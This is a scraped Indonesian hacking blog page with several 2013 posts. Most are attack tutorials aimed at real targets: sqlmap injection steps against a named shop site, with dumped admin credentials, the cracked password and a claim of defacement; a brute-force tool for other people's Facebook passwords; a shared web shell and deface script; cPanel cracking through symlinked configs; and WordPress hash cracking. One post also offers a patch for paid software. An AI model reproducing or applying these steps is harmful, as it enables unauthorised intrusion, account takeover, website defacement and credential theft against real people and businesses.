\

Featured

Powered by Blogger.

Blog Archive

Browsing "Older Posts"

Selamat sore teman teman IDCA :D
Oke sesuai judul, ane mau bagi trik yang ane dapet hasil dari searching nih, langsung aja yah ..

Monggo disimak, yang make Windows jangan iri yaaaaa, cos ini cuma buat yang make backtrack aja :D :D :P

1. Buka terminal/console dulu om, lalu masukan perintah :
apt-get install oxygen-cursor-theme-extra


2. Tunggu proses sampek selesai, kalau sudah tinggal dibuka deh :
Klik kanan -> Change Desktop Background -> Theme -> Costumizer -> Pointer





Nah keren kan XD XD , selamat mencoba :)

Refrensi : disini

Content Creator : Bimo Septiawan
Tags:

Mengganti Cursor di Backtrack 5

By admin → Tuesday, April 30, 2013
Posted by admin at 2:40 AM 0 comments
Labels:
Assalamuallaikum :D

Bingung mau share apa lagi, nih aku share SHELL aja yah ^_^

Fiturnya cukup lengkap kok :D

[+] PENAMPAKAN [+]

~# LOGIN SHELL #~


~# PENAMPAKAN SHELL #~


Password Shell :: idca

Download Here 

Happy Hacking :D

Content Creator : Bimo Septiawan
Tags:

Shell IDCA First Edition

By admin → Monday, April 29, 2013
Posted by admin at 4:12 AM 0 comments
Labels:

Assalamualaikum...

Nih ane punya aplikasi hack facebook (kata org2 :3) yg bisa sobat gunakan untuk menemukan password dari akun facebook orang lain :D caranya penggunaaanya sangat mudah dan simple aja kok,, yuk disimak :D untuk pengguna windows, disarankan untuk melengkapin bahan2 yg telah dilampirkan agar aplikasi tersebut bisa berjalan dengan baik :) dan sebelumnya tools ini sudah ane coba, dan masih work 100% :D

UPDATE : Not Working on Windows XP :p dan Bacanya ampe abis!!!!!!!!

Bahan - Bahan

1. Python 2.7 | Download

2. Aplikasi Hack Facebook | Download Password: Lihat

3. Wordlist | Use your brain :p (pikirkan kira2 passwordnya apaan)

4.Mechanize | Baca bagian bawah! :p

Langkah - Langkah

"Mohon sedikit meyisihkan waktunya untuk memberikan donasi, dengan cara mengklik gambar yg berlabel Sponsor.. Terimakasih "

Download dulu bahan2 lalu install Python 2.7 nya, kemudian extract file tool hack FB nya, kalo ane di extract di partisi D:\



Kemudian buka terminal sobat dan masuk ke directori D:\facebook


Setelah itu jalankan toolnya dengan cara ketik facebook.py lalu enter! masukkan email/username akun facebook target lalu enter! trus masukin juga nama file password list yg isinya merupakan kumpulan dari kombinasi kata, huruf dan angka, lalu enter!


Sekarang tinggal nunggu hasilnya, lama prosesnya tergantung dari banyaknya wordlist yg digunakan! kalo punya ane cuma 1GB, jadi sekitar beberapa menit menit aja :D


Setelah menunggu beberapa saat, ketemu dah passwordnya :D



Nah tinggal Login aja ke Facebooknya :D

Akun ini milik Onix AQua


Udah yaa, Selamat mencoba aja.. Goodluck!! :D


kalo seandainya sobat meengalami error saat menjalankan toolsnya, silahkan install Mechanize! Download disini! cara installnya via terminal masuk dulu ke directori mechanize, lalu ketik perintah : setup.py install lalu enter! liat gambar!



Note: " Semakin banyak wordlistnya semakin bagus :D karna cara kerja tools ini menebak password berdasarkan wordlist yg tersedia, usahakan buat wordlistnya se unik mungkin utk hasil yg lebih maksimal :D "

Sekian tutorial singkat dari ane, mudah2an bermanfaat yah :p

Content Creator : Onix AQua


Tags:

Tool Hack Akun Facebook 2013

By admin → Sunday, April 28, 2013
Posted by admin at 4:56 AM 0 comments
Labels:
Assalamualaikum,  :D

Pas ane berkunjung ke webnya om Zandy, ane nemuin tuh di postingnya "Script Deface Keren" nah ane jadi kepikiran mau bikin artikel terkait juga ^_^

Nah bagi yang mungkin belum bisa buat script sendiri ane kasih beberapa contoh script nantinya ^_^
Oke, nih yang pertama ane kasih satu dulu script deface yang keren :D , daripada pusing-pusing nyusun script langsung ambil aja script ini :D

[+] PENAMPAKAN [+]


Ambil Scriptnya DISINI

Silahkan edit sesuka kalian :D

Recode dari Scriptnya K4C3 Undetected kayaknya :D
Tags:

Script Deface : Logo g3tar

By admin →
Posted by admin at 2:17 AM 0 comments
Labels:
Assalamualaikum :)

Kali ini ane mau share tutorial tentang "Trik Facebook" hehe , sekali kali main main ke facebook lah bosen kalo mpes mpes mulu KWOKWOKWO ..

oke sekarang ane mau share trik "AUTO INVITE LIKE FANS PAGE FB" , nah maksudnya apaan coba ?

itu loh kayak kita mengundang temen kita buat like FP kita, nah kalo mau invite semua kan capek tuh temen juga udah bejibun banyaknya KWOKWOKW XD

Nih gua kasih tips/trik biar gak perlu capek capek :)

1. Login ke akun facebook kalian :D
2. Pergi ke Fans Page yang ingin kalian auto invite (*HARUS JADI ADMIN DULU)
3. Sekarang klik "Undang Teman" -> Klik "Semua Teman"
4. Setelah itu SCROLL deh sampek mentok kebawah atau terserah ente deh mau sampek mana :*
5. Setelah itu silahkan ketikan/klik :
  • GOOGLE CHORME -> Klik Kanan -> Inspect Element -> Console
  • MOZILLA FIREFOX -> CTRL + SHIFT + K
6. Masukan SCRIPT INI ::

SCRIPT REMAS SAYA :* | Join DISINI biar bisa lihat scriptnya

-- SCRIPTNYA GAK BISA DI TULIS DI SINI (kepotong), maaf yaa --



(delok hasile gambar)


7. Setelah script dimasukan silahkan tekan ENTER :D (*maka hasilnya akan seperti ini)


8. Tinggal klik KIRIM deh ^_^


Nah kan apa gua bilang, sekarang gak perlu capek capek Klik 1/1 teman kita ^_^

Selamat mencoba :*

Content Creator : Bimo Septiawan

Tags : Auto Invite, Cara Cepat Dapat Like Banyak, Auto , Bot Invite, Script Invite, Trik FP, Trik FB





Tags:

Cara Mengundang Seluruh Teman Untuk Like FP Kamu

By admin → Thursday, April 25, 2013
Posted by admin at 6:43 AM 0 comments
Labels:

Assalamualaikum Wr, WB,

maaf yah om om sekalian, ane lama gak buat threat baru, nah sekarang mumpung ada waktu ane share nih cara deface website dengan SQLMAP di Backtrack 5 :D

Apa itu SQLMap ?


SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.

[+] BAHAN [+]

[+] LANGKAHNYA MBAH BRO [+]

Untuk mengetahui website yang kalian mau Inject itu Vuln atau tidak , silahkan kasih tanda ( ' ) di akhir  url target, contoh : http://vana-shop.com/product.php?c=1 saya tambahin ' menjadi

  • http://vana-shop.com/product.php?c=1' , nah kalo vuln nanti ada tulisan "you have an erro ...." mysql error dan sebagainya"

sekarang waktunya di hajar kalo udah ketemu web yang vuln :P

1. Setelah instal python, sekarang kalian extrack SQLMAPnya di Drive C:, setelah di extrack buka CMD lalu ketikan :

2. Stelah itu, kalian mulailah scan website target dengan perintah :
  • sqlmap.py -u http://www.BUGWEBTARGET.com --dbs
Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs , klik [ENTER]


3. Tuh kan keliatan DATABASE nya :D , sekarang waktunya kita scan dengan perintah :
Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables , maka hasilnya akan seperti ini :


4. Nah keliatan kan Table di databasenya ? nah sekarang kita scan table tersebut (*cari yang menurut kalian terdapat info tentang user dan pass website) kalo udah yakin disana ada infonya, ketikan perintah :
  • sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns
Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns , tekan enter maka hasilnya akan seperti ini :


5. Nah setelah keliatan Tabelnya sekarang kita ketikan perintah :
  • sqlmap.py -u http://www.target.com -D nama_database -T nama_table --dump
Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump , klik enter 

 Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip" :
  • do you want to crack them via a dictionary-based attack? [Y/n/q] 
Maka Hasilnya akan seperti ini :




nah itu kita dapetin User + Passwordnya :D

User : admin
Pass : dfc560ef836a9a63c2bdbfb24a683624

Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya caranya pergi ke :


Nah setelah saya Decrypt ane dapetin nih :

Pass : dfc560ef836a9a63c2bdbfb24a683624 :: myluckyshop$

Sekarang tinggal login ke admin dan tebas deh :D


HASIL : 

masih kena deface tuh : http://www.vana-shop.com/

dah yah sekian dulu Postingnya, ane males ngetik lagi KWOKWOWK XD

Sama kan kayak make BACKTRACK 5 :D

Semoga berhasil :)

Content Creator : Bimo Septiawan a.k.a Cyber404






Tags:

Deface Dengan SQLMAP di WINDOWS 7

By admin → Wednesday, April 24, 2013
Posted by admin at 8:52 AM 0 comments
Labels: ,
Assalamualaikum Wr, WB,

maaf yah om om sekalian, ane lama gak buat threat baru, nah sekarang mumpung ada waktu ane share nih cara deface website dengan SQLMAP di Backtrack 5 :D

Apa itu SQLMap ?


SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.

[+} BAHAN [+]

  • Python | Available on Backtrack
  • Sqlmap | Available on Backtrack
[+] LANGKAHNYA MAS BRO [+]

(*Untuk Windows kalian cari dulu ke sini )

1. Kita cari dulu target yang mau kita scan (*jika ada bugs akan seperti ini)



2. Buka dulu SQLMAPnya, kalo di Backtrack 5 ketikan printah
  • cd /pentest/web/scanners/sqlmap /

3. Ketikan printah ini :
  • python sqlmap.py -u http://www.BUGWEBTARGET.com --dbs
Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs

setelah itu klik enter, maka akan muncul Database Target (*See Image)



4. Setelah dapet nama Data Basenya kita ketikan printah :
  • python sqlmap.py -u http://TARGET.com -D nama_database -tables

Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables  [tekan enter] hasil :



5. Setelah dapat table pada databasenya silahkan cari table yang menurut kalian ada USER + PASS website tersebut, kali ini saya coba scan TABLE USER, dengan perintah :
  • python sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns
Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns [lalu tekan ENTER] maka hasilnya akan seperti ini :

6. Setelah itu kita scan lagi table itu untuk mendapatkan user dan pass admin website, dengan perintah :
  • python sqlmap.py -u http://www.target.com -D nama_database -T table --dump
Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump [tekan ENTER]

Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip"

  • do you want to crack them via a dictionary-based attack? [Y/n/q] maka hasilnya :



nah itu kita dapetin User + Passwordnya :D

User : admin
Pass : dfc560ef836a9a63c2bdbfb24a683624

Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya caranya pergi ke :


Nah setelah saya Decrypt ane dapetin nih :

Pass : dfc560ef836a9a63c2bdbfb24a683624 :: myluckyshop$

Sekarang tinggal login ke admin dan tebas deh :D


HASIL : 

masih kena deface tuh : http://www.vana-shop.com/

dah yah sekian dulu Postingnya, ane males ngetik lagi KWOKWOWK XD

Semoga berhasil :)

Content Creator : Bimo Septiawan a.k.a Cyber404




Tags:

Deface Dengan SQLMAP di Backtrack 5

By admin →
Posted by admin at 2:47 AM 0 comments
Labels: , ,


Websecurify is a powerful web application security testing platform designed from the ground up to provide the best combination of automatic and manual vulnerability testing technologies. It is available for all major desktop platforms including mobile devices and web via our online security suite.
Tags:

Websecurify :: Tools

By admin → Tuesday, April 23, 2013
Posted by admin at 1:48 PM 0 comments
Labels:
pywebfuzz is a Python module to assist in the identification of vulnerabilities in web applications through brute force methods. The module does this by providing common testing values along with generators and other utilities that would be helpful when fuzzing web applications.
Tags:

Pywebfuzz :: Tools

By admin →
Posted by admin at 1:42 PM 0 comments
Labels:

WebVulScan is a web application vulnerability scanner. It is a web application itself written in PHP and can be used to test remote, or local, web applications for security vulnerabilities. As a scan is running, details of the scan are dynamically updated to the user. These details include the status of the scan, the number of URLs found on the web application, the number of vulnerabilities found and details of the vulnerabilities found.
After a scan is complete, a detailed PDF report is emailed to the user. The report includes descriptions of the vulnerabilities found, recommendations and details of where and how each vulnerability was exploited.

                                             webvulscan


Tags:

Webvulscan :: Tools

By admin →
Posted by admin at 1:40 PM 0 comments
Labels:
subterfuge-tools
Automated Man-in-the-Middle Attack Framework
Walk into Starbucks, plop down a laptop, click start, watch the credentials roll in. Enter Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attack and make it as simple as point and shoot. A beautiful, easy to use interface which produces a more transparent and effective attack is what sets Subterfuge apart from other attack tools. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials that go across the network, and even exploiting machines through race conditions. Now walk into a corporation…

Tags:

subterfuge :: Tools

By admin →
Posted by admin at 1:39 PM 0 comments
Labels:


                            ssa-security-system-analyzer-tools

SSA (Security System Analyzer) is free non-intrusive OVAL, FDCC, XCCDF and SCAP scanner. It provides security testers, auditors with an advanced overview of the security policy level applied.
Tags:

ssa ( Security System Analyzer) :: Tools

By admin →
Posted by admin at 1:38 PM 0 comments
Labels:

Assalamualaikum.. :)

Hay Sobat, ketemu lagi dahh :D Pernah liat yg seperti dibawah ini? :D

$P$B12345678SK.X5r1iISZN0baAvEvEj0
$P$B12345678ZiFnCoy7w6GTPrB3CkpqJ0
$P$B12345678WCBznPM8xM5iD8Z.SLgTx/
$P$B123456784oLOGhf1nRTZQ/lvWT8mc0
$P$B12345678JC/b3vIsxnmQm5u2XkFKq.

Nah, ane sekarang mau share tentang trik bagaimana ngecrack password hash yang digunakan pada web yg menggunakan CMS Wordpress. Soalnya ane liat banyak sekali yang masih bingung bagaimana caranya bahkan ga tau sama sekali tentang password hash wordpress. berbeda dengan password hash MD5 rata2 tools decript/crack nya udah bertebaran dimana-mana baik offline maupun online. 

Saran ane kalo mau bisa crack password hash harus tau dulu jenis-jenis hash tersebut. silahkan sobat cari dah di google banyak berserakan :D banyak baca banyak ilmu :p

Cukup dah ngomel ngomelnya :D langsung ke TKP :D

Sediakan Bahan - Bahan :

1. Hashcat | Download Password: Lihat

2.Wordlist | Download | Download

3.Sedikit Otak, dan Kesabaran :p

Langkah - Langkah:


Pertama extrack file hashcat dan wordlist dipartisi disk yg sobat inginkan, kalo ane disini ane letak di partisi D:\ liat gambar baik2 tuh :D



Lalu buka Hashlist.txt dan masukkan Hash yg mau sobat crack, dan save lagi :D


Selanjutnya buka terminal command, cari aja di Start>Run>ketik cmd! dan enter!



Setelah terminal terbuka, posisikan directori ke folder D:\Hashcat. liat gambar!


Selanjutnya ketik perintah : hashcat-cli32.exe -m 400 hashlist.txt wordlist.txt  lalu enter!



Silahkan sobat tunggu beberapa tahun yah :D eh, beberapa saat :D tunggu ampe selesai aja ;)


Nah tuw, udah keluar hasilnya :


$P$B12345678SK.X5r1iISZN0baAvEvEj0:l4I2GL4HsK7Tw
$P$B12345678ZiFnCoy7w6GTPrB3CkpqJ0:r3dm0nd_admin
$P$B12345678WCBznPM8xM5iD8Z.SLgTx/:4dm!n_w38
$P$B123456784oLOGhf1nRTZQ/lvWT8mc0:w38m45t3r
$P$B12345678JC/b3vIsxnmQm5u2XkFKq.:!nd0n3s!4n_cy83r_4rmy

Note: "Biar lebih maknyoooss, banyakin aja wordlistnya :D punya ane ampe 1 GB :3"

Jika sobat ingin meggunakan perintah2 yg lain atau mau coba crack hash jenis yg lain, silahkan sobat ketik perintah :  hashcat-cli32.exe --help



Sekian tutorial singkat dari ane, kalo ada yg kurang mohon dikoreksi, ntar ane perbaiki :D

Wasalamualaikum..

Contet Creator: Onix AQua
Tags:

Crack Hash MD5(wordpress) dengan Hashcat

By admin →
Posted by admin at 7:40 AM 0 comments
Labels: ,
hallo mbah dono post nih dari kemarin saya mau post ini  tapi ga jalan terus akibat sibuk edit shell 012Adapun manfaat menggunakan Mask My IP Pro ini selain untuk menjaga privasi juga bisa untuk membuka situs yang diblokir oleh ISP maupun pemerintah dan melindungi kita dari hacker. (wew) 012 biasah aja mukanya ya jangan nyolot 009
DOWNLOAD

Setup & Patch Mask My IP v2.3.3.6 (via Mediafire)
Patch Mask My IP v2.3.3.6 (via Box)

Mask My IP mendukung Windows 2000, XP, Vista, Windows 7 (32bit dan 64bit).
udah tahu ya silahkan berkomentar  009 oh ya kalau mau copas silahkan kasih sumber 007
Tags:

Mask My IP Pro v2.3 Full Version Patch

By admin → Tuesday, April 9, 2013
Posted by admin at 5:56 AM 0 comments
karena ini pake script uler , jadi pstiin dlu di pc atau leppy mu udah ada uler'a apa blum,.. kalau belum ya silahkan ya cari, jika kamu bertanya-tanya apa sih maksudnya script uler ???? hehehehe maksud saya tuh script python wkwkwkwkw maaf ya mas Dono suka bercanda hehehe
:guling2:
http://www.python.org/ftp/python/2.5/python-2.5.msi
yang make linux kan udah ada tuh, jadi gak perlu lagi install,.. Ok
nih script'a : KLIK ME PLIIIIIISSSSS......!!!!!!!!!:sokpinter:
bahan2 yang di perlukan :
1. config symlink
2. script crack cpanel,
3. terserah,.. atur ndri dah,..
:boss:
pertama buat dlu folder di C --> C:\a\
Atau di desktop buat yang make linux
setelah itu tggal comand aja di cmd :
PHP Code:
script.py [url config symlink] C:a 

yang di linux
PHP Code:
script.py [url config symlink] a 

tggu sampe proses'a kelar, setelah copas pass db yg muncul, trus tggal pake buat crack,..

:ganteng:semoga berguna,. 012
Tags:

crack cpanel pake pass dari config symlink

By admin → Monday, April 8, 2013
Posted by admin at 7:41 AM 0 comments
Subscribe to: Posts ( Atom )